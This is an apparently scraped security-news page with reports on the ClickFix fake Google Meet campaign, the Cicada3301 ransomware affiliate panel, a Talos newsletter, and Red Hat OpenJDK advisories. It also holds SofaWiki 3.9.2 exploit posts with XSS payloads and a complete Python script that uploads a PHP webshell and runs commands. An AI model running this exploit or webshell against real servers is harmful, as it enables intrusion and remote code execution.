Threat actors are leveraging fake Google Meet web pages as part of an ongoing malware campaign dubbed ClickFix to deliver infostealers targeting Windows and macOS systems.
"This tactic involves displaying fake error messages in web browsers to deceive users into copying and executing a given malicious PowerShell code, finally infecting their systems," French cybersecurity company Sekoia said in

Threat Intelligence / Phishing Attack

Threat actors are leveraging fake Google Meet web pages as part of an ongoing malware campaign dubbed **ClickFix** to deliver infostealers targeting Windows and macOS systems.

"This tactic involves displaying fake error messages in web browsers to deceive users into copying and executing a given malicious PowerShell code, finally infecting their systems," French cybersecurity company Sekoia said in a report shared with The Hacker News.

Variations of the ClickFix (aka ClearFake and OneDrive Pastejacking) campaign have been reported widely in recent months, with threat actors employing different lures to redirect users to bogus pages that aim to deploy malware by urging site visitors to run an encoded PowerShell code to address a supposed issue with displaying content in the web browser.

These pages are known to masquerade as popular online services, including Facebook, Google Chrome, PDFSimpli, and reCAPTCHA, and now Google Meet as well as potentially Zoom -

*   meet.google.us-join\[.\]com
*   meet.googie.com-join\[.\]us
*   meet.google.com-join\[.\]us
*   meet.google.web-join\[.\]com
*   meet.google.webjoining\[.\]com
*   meet.google.cdm-join\[.\]us
*   meet.google.us07host\[.\]com
*   googiedrivers\[.\]com
*   us01web-zoom\[.\]us
*   us002webzoom\[.\]us
*   web05-zoom\[.\]us
*   webroom-zoom\[.\]us

On Windows, the attack chain culminates in the deployment of StealC and Rhadamanthys stealers, while Apple macOS users are served a booby-trapped disk image file ("Launcher\_v1.94.dmg") that drops another stealer known as Atomic.

This emerging social engineering tactic is notable for the fact that it cleverly evades detection by security tools, as it involves the users manually running the malicious PowerShell command directly on the terminal, as opposed to being automatically invoked by a payload downloaded and executed by them.

Sekoia has attributed the cluster impersonating Google Meet to two traffers groups, namely Slavic Nation Empire (aka Slavice Nation Land) and Scamquerteo, which are sub-teams within markopolo and CryptoLove, respectively.

"Both traffers teams \[...\] use the same ClickFix template that impersonates Google Meet," Sekoia said. "This discovery suggests that these teams share materials, also known as 'landing project,' as well as infrastructure."

This, in turn, has raised the possibility that both the threat groups are making use of the same, as-yet-unknown cybercrime service, with a third-party likely managing their infrastructure.

The development comes amid the emergence of malware campaigns distributing the open-source ThunderKitty stealer, which shares overlaps with Skuld and Kematian Stealer, as well as new stealer families named Divulge, DedSec (aka Doenerium), Duck, Vilsa, and Yunit.

"The rise of open-source infostealers represents a significant shift in the world of cyber threats," cybersecurity company Hudson Rock noted back in July 2024.

"By lowering the barrier of entry and fostering rapid innovation, these tools could fuel a new wave of computer infections, posing challenges for cybersecurity professionals and increasing the overall risk to businesses and individuals."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign

Plus, a zero-day vulnerability in Qualcomm chips, exposed health care devices, and the latest on the Salt Typhoon threat actor.

Thursday, October 17, 2024 14:00

When I first interviewed with Joel Esler for my position at Cisco Talos, I remember when the time came for me to ask questions, one thing stood out. I asked what resources were available to me to learn about cybersecurity, because I was totally new to the space.  

His answer: The people. When I asked that question, Joel told me that the entire office was a library for me. He told me to just ask as many questions as I could. 

Coming from journalism, where I was reporting on a range of topics from local government, finance and banking, art and culture, and sports, cybersecurity was totally new to me. Now almost seven years later, I’ve been able to host a podcast that went nearly 200 episodes, relaunch a cybersecurity newsletter, researched malicious Facebook groups trading stolen personal information, and I’ve even learned how to write a ClamAV signature. 

Unfortunately, this week is my last at Talos, but far from my last in cybersecurity. I’m off to a new adventure, but I wanted to take the space here to talk about what I’ve learned in my career at Talos.  

I think that this is a good lesson for anyone reading this: If you want to work in cybersecurity, you can, no matter what your background or education is. I’ve met colleagues across Talos who previously studied counterterrorism operations, German and Russian history, and political science. And I walked into my first day on the job knowing next to nothing about cybersecurity. I knew I could write, and I knew I could help Talos tell their story (and clean up the occasional passive voice in their blog posts). But I had never heard of a remote access trojan before.  

I hope these lessons resonate with you, your team, or the next person you think about hiring into the cybersecurity industry.  

1.  **You can’t do any of this without people.** This has become extraordinarily relevant this year with the advent of AI. I personally have beef with the term “AI” anyway because we’ve been using machine learning in cybersecurity for years now, which is essentially what we’re using the “AI” buzzword to mean now. But at the end of the day, people are what makes cybersecurity detection work in the first place. If you don’t have a team that’s ready to put in the work necessary to write, test and improve the intelligence that goes into security products (AI or not), you’re doomed. Any of these tools are only as good as the people who put the information into them. I’ve been beyond impressed with the experience, work ethic, and knowledge that everyone in Talos has. They are what makes the engine run, and none of this would work without them. 
2.  **You can carve out your own niche in cybersecurity.** That said, you don’t have to know how to code to work in cybersecurity if you don’t want to. Anyone can carve out their own niche in the space with their own skillset. I still barely know how to write Python, but I’ve been able to use the skills that I do have (research, writing, storytelling, audio editing, etc.) to carve out my space in cybersecurity. I can speak intelligently about security problems and solutions with my colleagues without needing to know how to reverse-engineer a piece of malware. And even on the technical side of things, everyone can carve out their own specialty. Talos has experts on email spam, and even specific types of email spam, that their colleagues may not know anything about. Others specialize in certain geographic areas because they can speak the language there and can peel back an additional layer that non-native speakers can’t.  
3.  **Be a sponge.** Going back to the opening of this week’s newsletter, I needed to ask hundreds of questions in my first few months at Talos. It took me a good amount of time to get over my fear of looking stupid, and that held me back early on from having more intelligent conversations with my teammates because I would keep questions inside or just assume that Google had the right answers. No matter how many years you’ve been in the security space, there is always something new to learn. Never assume you know everything there is to know on a given topic. If you are a sponge for information, you never know what new skills you can pick up along the way. When I graduated from college with a journalism degree, I never would have believed you if you told me at the time that I’d be needing to understand how atomic clocks keep power grids running. But here we are. 

The Threat Source newsletter will be off for a few weeks while it undergoes a revamp, and it’ll be back with a new look.  

I want to thank everyone who has enabled me to grow and shape this newsletter over the years, growing it to thousands of subscribers. And, of course, thanks to the readers who have engaged, read and shared over the years.  

**The one big thing **

Cisco Talos has observed a new wave of attacks active since at least late 2023, from a Russian-speaking group we track as “UAT-5647” against Ukrainian government entities and unknown Polish entities. The latest series of attacks deploys an updated version of the RomCom malware we track as “SingleCamper.” This version is loaded directly from the registry into memory and uses a loopback address to communicate with its loader. 

**Why do I care? **

UAT-5647 has long been considered a multi-motivational threat actor performing ransomware and espionage-oriented attacks. However, in recent months, it has accelerated its attacks with a clear focus on establishing long–term access for exfiltrating data of strategic interest to it. UAT-5647 has also evolved its tooling to include four distinct malware families: two downloaders we track as RustClaw and MeltingClaw, a RUST-based backdoor we call DustyHammock, and a C++-based backdoor we call ShadyHammock. 

**So now what? **

Cisco Talos has released several Snort rules and ClamAV signatures to detect and defend against the several malware families that UAT-5647 uses.  

**Top security headlines of the week **

**Government and security officials are still unraveling what to make of recent revelations around multiple Chinese-state-sponsored actors infiltrating U.S. networks.** Most recently, Salt Typhoon was unveiled as a new actor that may have accessed foreign intelligence surveillance systems and electronic communications that some ISPs collect. like Verizon and AT&T collect based on U.S. court orders. The actor reportedly accessed highly sensitive intelligence and law enforcement data. This followed on reports earlier this year of other Chinese state-sponsored actors Volt Typhoon and Flax Typhoon, which targeted U.S. government networks and systems on military bases. One source told the Wall Street Journal that the latest discovery of Salt Typhoon could be “potentially catastrophic.” The actor allegedly gained access to Verizon, AT&T and Lumen Technologies by exploiting systems those companies use to comply with the U.S. CALEA act, which essentially legalizes wiretapping when required by law enforcement. (Axios, Tech Crunch) 

**Chip maker Qualcomm says adversaries exploited a zero-day vulnerability in dozens of its chipsets used in popular Android devices.** While few details are currently available regarding the vulnerability, CVE-2024-43047, researchers at Google and Amnesty International say they are working with Qualcomm to remediate and responsibly disclose more information. Qualcomm listed 64 different chipsets as being affected by the vulnerability, including the company’s Snapdragon 8 mobile platform, which is used many Android phones, including some made by Motorola, Samsung and ZTE. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) also added the issue to its Known Exploited Vulnerabilities catalog, indicating they can confirm it’s been actively exploited in the wild. Qualcomm said it issued a fix in September, and it is now on the device manufacturers to roll out patches to their customers for affected devices. (Android Police, Tech Crunch) 

**As many as 14,000 medical devices across the globe are online and vulnerable to a bevy of security vulnerabilities and exploits, according to a new study.** Security research firm Censys recently found the devices exposed, which “greatly raise the risk of unauthorized access and exploitation.” Forty-nine percent of the exposed devices are located in the U.S. America’s decentralized health care system is largely believed to affect the amount of vulnerable devices, because there is less coordinaton to isolate the devices or patch them when vulnerabilities are disclosed, unlike countries like the U.K., where the health care system is solely organized and managed by the government. The Censys study found that many of the networks belonging to smaller health care organizations used residential ISPs, making them inherently less secure. Others set up devices and connected them to the internet without changing the preconfigured credentials or leaving their connections unencrypted. Others had simply been misconfigured. Open DICOM and DICOM-enabled web interfaces that are intended to share and view medical images were responsible for 36 percent of the exposures, with 5,100 IPs hosting these systems. (CyberScoop, Censys) 

**Can’t get enough Talos? **

*   Attackers Delight: Why Does Healthcare See So Many Attacks? 
*   Ghidra data type archive for Windows driver functions 
*   Protecting major events: An incident response blueprint 

**Upcoming events where you can find Talos**

**MITRE ATT&CKcon 5.0** **(Oct. 22 - 23)** 

_McLean, Virginia and Virtual_

Nicole Hoffman and James Nutland will provide a brief history of Akira ransomware and an overview of the Linux ransomware landscape. Then, morph into action as they take a technical deep dive into the latest Linux variant using the ATT&CK framework to uncover its techniques, tactics and procedures.

**it-sa Expo & Congress** **(Oct. 22 - 24)** 

_Nuremberg, Germany_

**White Hat Desert Con** **(Nov. 14)** 

_Doha, Qatar_

**misecCON** **(Nov. 22)** 

_Lansing, Michigan_

Terryn Valikodath from Cisco Talos Incident Response will explore the core of DFIR, where digital forensics becomes detective work and incident response turns into firefighting.

**Most prevalent malware files from Talos telemetry over the past week **

_There is no new data to report this week. This section will be overhauled in the next edition of the Threat Source newsletter._

What I’ve learned in my first 7-ish years in cybersecurity

Protect yourself from the ClickFix attack! Learn how cybercriminals are using fake Google Meet pages to trick users…

Protect yourself from the ClickFix attack! Learn how cybercriminals are using fake Google Meet pages to trick users into downloading malware. Discover the latest tactics employed by these malicious actors and stay safe online.

Cybersecurity researchers at Sekoia have detected an uptick in cyberattacks targeting users of the popular video conferencing platform, Google Meet, employing a notorious tactic, dubbed “ClickFix.” This tactic emerged in May 2024 and involves mimicking legitimate services like Google Chrome, Facebook, or Google Meet, to trick users into downloading malware.

According to Sekoia’s report, attackers are displaying fake error messages mimicking legitimate alerts from Google Meet, prompting users to click a “Fix It” button or perform other actions. However, these actions unknowingly execute malicious code that installs malware on the victim’s device. 

The ClickFix campaign leverages multiple malware distribution campaigns. Sekoia researchers analyzed a ClickFix cluster impersonating Google Meet video conferences, which targeted both Windows and macOS users.

For Windows users, the fake error message claimed microphone or headset issues, prompting them to copy a script that downloaded Stealc and Rhadamanthys infostealers. macOS users were tricked into downloading the AMOS Stealer malware.  

> _“Given the variety of initial malicious websites redirecting to this infrastructure, we assess with high confidence that it is shared among multiple threat actors. They collaborate within a centralized Traffers team to share certain resources, including this infrastructure and the AMOS Stealer, which is also sold as Malware-as-a-Service.”_
> 
> Sekoia

****Possible Perpetrators****

The investigation revealed that two cybercrime groups, “Slavic Nation Empire” (linked with cryptocurrency scam team Marko Polo) and “Scamquerteo Team” (a subgroup of cryptocurrency scam team CryptoLove), were likely behind this ClickFix cluster. These groups specialize in targeting users involved in cryptocurrency assets, Web3 applications, and decentralized finance (DeFi).  

Both teams use the same ClickFix template to impersonate Google Meet, suggesting they share materials and infrastructure. Sekoia analysts estimate that both teams use the same cybercrime service to supply the fake Google Meet cluster, and it is likely that a third party manages their infrastructure or registers their domain names.

The malware delivered through these attacks includes infostealers, botnets, and remote access tools. These malicious programs can steal sensitive data, compromise systems, and enable further attacks.

****ClickFix Scope****

The ClickFix tactic is particularly dangerous because it bypasses traditional security measures. By not requiring users to download a file directly, it avoids detection by web browser security features. This makes it more likely to ensnare unsuspecting victims.  

To protect yourself from ClickFix attacks, be cautious of unexpected error messages, verify scripts before copying and pasting them from unknown sources, use strong security software like antivirus and anti-malware, be cautious with links, and enable two-factor authentication to add an extra layer of security to your online accounts.

1.  Konni RAT Exploiting Word Docs to Steal Data from Windows
2.  Fake Chrome Browser Update Installs NetSupport Manager RAT
3.  Bifrost RAT Variant Targets Linux Devices, Mimics VMware Domain
4.  AsyncRAT Infiltrates Key US Infrastructure Through GIFs and SVGs
5.  Popular Android Screen Recorder iRecorder App Revealed as Trojan

ClickFix Attack: Fake Google Meet Alerts Install Malware on Windows, macOS

Cybersecurity researchers have gleaned additional insights into a nascent ransomware-as-a-service (RaaS) called Cicada3301 after successfully gaining access to the group's affiliate panel on the dark web.
Singapore-headquartered Group-IB said it contacted the threat actor behind the Cicada3301 persona on the RAMP cybercrime forum via the Tox messaging service after the latter put out an

Ransomware / Network Security

Cybersecurity researchers have gleaned additional insights into a nascent ransomware-as-a-service (RaaS) called **Cicada3301** after successfully gaining access to the group's affiliate panel on the dark web.

Singapore-headquartered Group-IB said it contacted the threat actor behind the Cicada3301 persona on the RAMP cybercrime forum via the Tox messaging service after the latter put out an advertisement, calling for new partners into its affiliate program.

"Within the dashboard of the Affiliates' panel of Cicada3301 ransomware group contained sections such as Dashboard, News, Companies, Chat Companies, Chat Support, Account, an FAQ section, and Log Out," researchers Nikolay Kichatov and Sharmine Low said in a new analysis published today.

Cicada3301 first came to light in June 2024, with the cybersecurity community uncovering strong source code similarities with the now-defunct BlackCat ransomware group. The RaaS scheme is estimated to have compromised no less than 30 organizations across critical sectors, most of which are located in the U.S. and the U.K.

The Rust-based ransomware is cross-platform, allowing affiliates to target devices running Windows, Linux distributions Ubuntu, Debian, CentOS, Rocky Linux, Scientific Linux, SUSE, Fedora, ESXi, NAS, PowerPC, PowerPC64, and PowerPC64LE.

Like other ransomware strains, attacks involving Cicada3301 have the ability to either fully or partially encrypt files, but not before shutting down virtual machines, inhibiting system recovery, terminating processes and services, and deleting shadow copies. It's also capable of encrypting network shares for maximum impact.

"Cicada3301 runs an affiliate program recruiting penetration testers (pentesters) and access brokers, offering a 20% commission, and providing a web-based panel with extensive features for affiliates," the researchers noted.

A summary of the different sections is as follows -

*   **Dashboard** - An overview of the successful or failed logins by the affiliate, and the number of companies attacked
*   **News** - Information about product updates and news of the Cicada3301 ransomware program
*   **Companies** - Provides options to add victims (i.e., company name, ransom amount demanded, discount expiration date etc.) and create Cicada3301 ransomware builds
*   **Chat Companies** - An interface to communicate and negotiate with victims
*   **Chat Support** - An interface for the affiliates to communicate with representatives of the Cicada3301 ransomware group to resolve issues
*   **Account** - A section devoted to affiliate account management and resetting their password
*   **FAQ** - Provides details about rules and guides on creating victims in the "Companies" section, configuring the builder, and steps to execute the ransomware on different operating systems

"The Cicada3301 ransomware group has rapidly established itself as a significant threat in the ransomware landscape, due to its sophisticated operations and advanced tooling," the researchers said.

"By leveraging ChaCha20 + RSA encryption and offering a customizable affiliate panel, Cicada3301 enables its affiliates to execute highly targeted attacks. Their approach of exfiltrating data before encryption adds an additional layer of pressure on victims, while the ability to halt virtual machines increases the impact of their attacks."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Uncover Cicada3301 Ransomware Operations and Its Affiliate Program

SofaWiki version 3.9.2 suffers from a reflective cross site scripting vulnerability.

    # Exploit Title: SofaWiki 3.9.2 - Reflected XSS (Authenticated) via RegexReplace Preview# Date: 10/17/2024# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.sofawiki.com# Software Link: https://www.sofawiki.com/site/files/snapshot.zip# Version: 3.9.2# Tested on: Windows XP*Summary:*A *reflected XSS* vulnerability exists in the *Regex Replace Preview*feature of SofaWiki. When a malicious payload is injected into the *Replace*field, the payload is executed immediately in the user’s browser during thepreview. Proof of Concept (PoC):1. Login to SofaWiki.2. Go to Special => Regex :http://localhost/sofawiki/index.php?action=view&name=special:regex&lang=en3. In the Regex field, enter any text (e.g., test).4. In the Replace field, inject the following payload:<script>alert('XSS');</script>5. Click Replace Preview to trigger the XSS.

SofaWiki 3.9.2 Cross Site Scripting

Red Hat Security Advisory 2024-8129-03 - An update is now available for OpenJDK. Issues addressed include buffer overflow and integer overflow vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8129.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: OpenJDK 21.0.5 Security Update for Windows Builds  
Advisory ID:        RHSA-2024:8129-03  
Product:            OpenJDK  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8129  
Issue date:         2024-10-17  
Revision:           03  
CVE Names:          CVE-2023-48161  
====================================================================

Summary: 

An update is now available for OpenJDK.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The OpenJDK 21 packages provide the OpenJDK 21 Java Runtime Environment and the OpenJDK 21 Java Software Development Kit.

This release of the Red Hat build of OpenJDK 21 (21.0.5) for Windows serves as a replacement for the Red Hat build of OpenJDK 21 (21.0.4) and includes security and bug fixes. For further information, refer to the release notes linked to in the References section.

Security Fix(es):

* giflib: Heap-Buffer Overflow during Image Saving in DumpScreen2RGB Function (CVE-2023-48161)

* OpenJDK: Array indexing integer overflow (8328544) (CVE-2024-21210)

* OpenJDK: HTTP client improper handling of maxHeaderSize (8328286) (CVE-2024-21208)

* OpenJDK: Unbounded allocation leads to out-of-memory error (8331446) (CVE-2024-21217)

* OpenJDK:  Integer conversion error leads to incorrect range check (8332644) (CVE-2024-21235)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-48161

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2251025  
https://bugzilla.redhat.com/show_bug.cgi?id=2318524  
https://bugzilla.redhat.com/show_bug.cgi?id=2318526  
https://bugzilla.redhat.com/show_bug.cgi?id=2318530  
https://bugzilla.redhat.com/show_bug.cgi?id=2318534

Red Hat Security Advisory 2024-8129-03

SofaWiki version 3.9.2 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: SofaWiki 3.9.2 - Stored XSS (Authenticated)# Date: 10/17/2024# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.sofawiki.com# Software Link: https://www.sofawiki.com/site/files/snapshot.zip# Version: 3.9.2# Tested on: Windows XPSummary:A stored XSS exists in SofaWiki's Open Ticket feature. An authenticateduser can inject a JavaScript payload into the ticket's title field, whichtriggers whenever the ticket is viewed.Proof of Concept (PoC):1. Login and go to New Ticket:http://localhost/sofawiki/index.php?name=special:tickets&ticketaction=new2. Use this payload in the Title field:<script>alert('XSS');</script>3. Click Open Ticket the alert will be triggered.The payload runs each time the ticket is opened.

SofaWiki version 3.9.2 suffers from a remote shell upload vulnerability.

    # Exploit Title: SofaWiki 3.9.2 - Remote Code Execution (RCE) via Open Ticket File Upload# Date: 10/17/2024# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.sofawiki.com# Software Link: https://www.sofawiki.com/site/files/snapshot.zip# Version: 3.9.2# Tested on: Windows XPSummary:A remote code execution (RCE) vulnerability exists in the Open Ticketfeature of SofaWiki 3.9.2. An attacker can upload a malicious `.phar` filethat contains PHP code, bypassing `.htaccess` restrictions, and executearbitrary commands on the server.Exploit Steps:1. Login to SofaWiki.2. Navigate to Special → Tickets → New Ticket:http://localhost/sofawiki/index.php?name=special:tickets&ticketaction=new3. Select your shell.phar file with this content:   <?php system($_GET['cmd']); ?>4. Fill in the ticket title and click Open Ticket.5. After the ticket is created, the page shows a link to the uploadedshell.phar6. access the webshell:http://localhost/sofawiki/site/files/ticket-1-shell.phar?cmd=whoami--------------# Exploit Title: SofaWiki 3.9.2 - RCE (authenticated) via Open Ticket File Upload  Exploit# Date: 10/17/2024# Exploit Author: Chokri Hammedi# Vendor Homepage: https://www.sofawiki.com# Software Link: https://www.sofawiki.com/site/files/snapshot.zip# Version: 3.9.2# Tested on: Windows XPimport requestsimport reimport sysclass SofaWikiExploit:    def __init__(self, base_url, username, password):        self.base_url = base_url.rstrip('/')        self.username = username        self.password = password        self.session = requests.Session()    def detect_login_name(self):        response =self.session.get(f"{self.base_url}/index.php?action=login")        match = re.search(r'name="name" value="([^"]+)"', response.text)        if not match:            print("\033[91m\033[1m[-] couldn't find the 'name' field.Exiting.\033[0m")            sys.exit(1)        return match.group(1)    def login(self):        print("\033[93m[*] logging in...\033[0m")        login_name = self.detect_login_name()        data = {            "submitlogin": "Login",            "username": self.username,            "pass": self.password,            "name": login_name,            "action": "login"        }        response = self.session.post(f"{self.base_url}/index.php",data=data)        if "Logout" in response.text:            print("\033[92m\033[1m[+] Login successful!\033[0m")            return True        print("\033[91m[-] login failed.\033[0m")        return False    def upload_shell(self):        print("\033[93m[*] uploading shell...\033[0m")        shell_content = '<?php system($_GET["cmd"]); ?>'        files = {            'uploadedfile': ('shell.phar', shell_content,'application/octet-stream'),            'title': (None, 'Chokri Hammedi Exploit'),            'text': (None, 'Chokri Hammedi RCE'),            'assigned': (None, 'admin'),            'priority': (None, '1 high'),            'submitopen': (None, 'Open Ticket'),            'MAX_FILE_SIZE': (None, '8000000')        }        response =self.session.post(f"{self.base_url}/index.php?name=special:tickets",files=files)        match = re.search(r'File (.*?) uploaded', response.text)        if not match:            print("\033[91m[-] shell upload failed.\033[0m")            sys.exit(1)        shell_url = f"{self.base_url}/site/files/{match.group(1)}"        print(f"\033[92m[+] shell uploaded: {shell_url}\033[0m")        return shell_url    def execute_command(self, shell_url, cmd):        print(f"\033[93m[*] running command: {cmd}\033[0m")        response = self.session.get(f"{shell_url}?cmd={cmd}")        print("\033[92m[+] command output:\033[0m")        print(f"\033[1m{response.text}\033[0m")if __name__ == "__main__":    if len(sys.argv) != 5:        print(f"\033[91musage: {sys.argv[0]} <target_url> <username><password> <cmd>\033[0m")        sys.exit(1)    target_url, username, password, cmd = sys.argv[1:5]    exploit = SofaWikiExploit(target_url, username, password)    if exploit.login():        shell_url = exploit.upload_shell()        exploit.execute_command(shell_url, cmd)

SofaWiki 3.9.2 Shell Upload

Red Hat Security Advisory 2024-8126-03 - An update is now available for OpenJDK. Issues addressed include buffer overflow and integer overflow vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8126.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: OpenJDK 17.0.13 Security Update for Windows Builds  
Advisory ID:        RHSA-2024:8126-03  
Product:            OpenJDK  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8126  
Issue date:         2024-10-17  
Revision:           03  
CVE Names:          CVE-2023-48161  
====================================================================

Summary: 

An update is now available for OpenJDK.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The OpenJDK 17 packages provide the OpenJDK 17 Java Runtime Environment and the OpenJDK 17 Java Software Development Kit.

This release of the Red Hat build of OpenJDK 17 (17.0.13) for Windows serves as a replacement for the Red Hat build of OpenJDK 17 (17.0.12) and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.

Security Fix(es):

* giflib: Heap-Buffer Overflow during Image Saving in DumpScreen2RGB Function (CVE-2023-48161)

* OpenJDK: Array indexing integer overflow (8328544) (CVE-2024-21210)

* OpenJDK: HTTP client improper handling of maxHeaderSize (8328286) (CVE-2024-21208)

* OpenJDK: Unbounded allocation leads to out-of-memory error (8331446) (CVE-2024-21217)

* OpenJDK:  Integer conversion error leads to incorrect range check (8332644) (CVE-2024-21235)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-48161

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2251025  
https://bugzilla.redhat.com/show_bug.cgi?id=2318524  
https://bugzilla.redhat.com/show_bug.cgi?id=2318526  
https://bugzilla.redhat.com/show_bug.cgi?id=2318530  
https://bugzilla.redhat.com/show_bug.cgi?id=2318534

Red Hat Security Advisory 2024-8126-03

Red Hat Security Advisory 2024-8123-03 - An update is now available for OpenJDK. Issues addressed include buffer overflow and integer overflow vulnerabilities.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8123.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: OpenJDK 11.0.25 Security Update for Windows Builds  
Advisory ID:        RHSA-2024:8123-03  
Product:            OpenJDK  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8123  
Issue date:         2024-10-17  
Revision:           03  
CVE Names:          CVE-2023-48161  
====================================================================

Summary: 

An update is now available for OpenJDK.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

The OpenJDK 11 packages provide the OpenJDK 11 Java Runtime Environment and the OpenJDK 11 Java Software Development Kit.

This release of the Red Hat build of OpenJDK 11 (11.0.25) for Windows serves as a replacement for the Red Hat build of OpenJDK 11 (11.0.24) and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.

Security Fix(es):

* giflib: Heap-Buffer Overflow during Image Saving in DumpScreen2RGB  
Function (CVE-2023-48161)

* JDK: Array indexing integer overflow (8328544) (CVE-2024-21210)

* JDK: HTTP client improper handling of maxHeaderSize (8328286)  
(CVE-2024-21208)

* JDK: Unbounded allocation leads to out-of-memory error (8331446)  
(CVE-2024-21217)

* JDK: Integer conversion error leads to incorrect range check (8332644)  
(CVE-2024-21235)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2023-48161

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2251025  
https://bugzilla.redhat.com/show_bug.cgi?id=2318524  
https://bugzilla.redhat.com/show_bug.cgi?id=2318526  
https://bugzilla.redhat.com/show_bug.cgi?id=2318530  
https://bugzilla.redhat.com/show_bug.cgi?id=2318534

Tag

#windows